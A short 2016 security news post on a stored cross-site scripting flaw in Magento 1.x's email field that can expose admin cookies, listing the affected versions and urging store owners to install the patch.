New XSS Bug Discovered in Magento

Posted on the 26th January 2016

The Magento project has just published a new security patch which fixes a critical XSS bug that allows malicious attackers to take over online stores. The bug is a cross-site scripting vulnerability which relates to the way in which email addresses are handled in the system.

When a user registers a new account or updates their email address on their existing account, the CMS does not properly sanitise the data that is entered into the email field. Because the field is not filtered correctly, certain ‘bad characters’ can make it through, and this allows the attackers to enter malicious code into the field.

Easy to Exploit

This bug is incredibly easy for skilled hackers and crackers to exploit. All the attacker has to do is make an order using an account that has a ‘poisoned’ email address, and then when the store owner opens the order using Magento’s admin panel, the malicious code will be executed by the CMS.

The malicious code could include JavaScript, which means that the attacker can steal the admin’s cookies and then use those cookies to gain access to the admin panel of the site. There is also the potential for other code to be embedded.

This makes the vulnerability a level 7 on a scale of 1 to 10, so it is very serious. Interestingly enough, this vulnerability is similar to one that was discovered in Jetpack for WordPress in October 2015. The Magento version of the vulnerability affects Versions 1.9.2.2 and older of the community edition, and versions 1.14.2.2 or older of the Enterprise Edition. The newly released Magento 2.0 does not suffer from this particular XSS issue, although there is a different stored XSS vulnerability that does affect this version.

If you have not yet migrated to Magento 2.0, then you should make sure that you install the security update for Magento 1.x. If you are a Magento 2.0 user, you should update to the latest version of the software. The updates are free for all users, so there is absolutely no reason not to take advantage of them.

Installing incremental updates is almost invariably easier than migrating from 1.x to 2.0, and should not require significant store downtime. Leaving your site unpatched is a serious risk, and given the popularity of automated hacking scripts there is a high chance of even small sites being targeted.